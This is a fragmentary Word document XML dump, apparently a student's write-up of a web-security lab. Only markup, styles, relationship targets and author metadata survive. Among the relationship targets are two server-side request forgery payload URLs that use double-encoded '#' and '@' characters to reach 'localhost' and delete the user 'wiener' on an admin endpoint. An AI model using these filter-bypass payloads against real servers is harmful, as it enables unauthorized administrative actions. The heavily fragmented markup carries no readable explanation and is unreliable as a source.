    <w:p w14:paraId="4F9EBBF2" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="008C7ACF" w:rsidRDefault="00A81D95" w:rsidP="00A81D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3ACDFA" wp14:editId="28FCD859">
            <wp:extent cx="5715000" cy="2720340"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1248744938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44938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36A45" w14:textId="77777777" w:rsidR="0016673F" w:rsidRDefault="0016673F"/>
    <w:sectPr w:rsidR="001667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D95"/>
    <w:rsid w:val="0016673F"/>
    <w:rsid w:val="00A81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16E84"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{153F7531-A3FE-4923-BFF6-8B2C89805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MY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1D95"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00A81D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1D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1D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1D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81D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%2523$@stock.weliketoshop.net/admin" TargetMode="External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localhost%2523$@stock.weliketoshop.net/admin/delete?username=wiener" TargetMode="Externa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317</Words>
  <Characters>1813</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>15</Lines>
  <Paragraphs>4</Paragraphs>
  <ScaleCrop>false</ScaleCrop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 YAO CHANG</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>WONG YAO CHANG</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-09T09:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-09T09:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>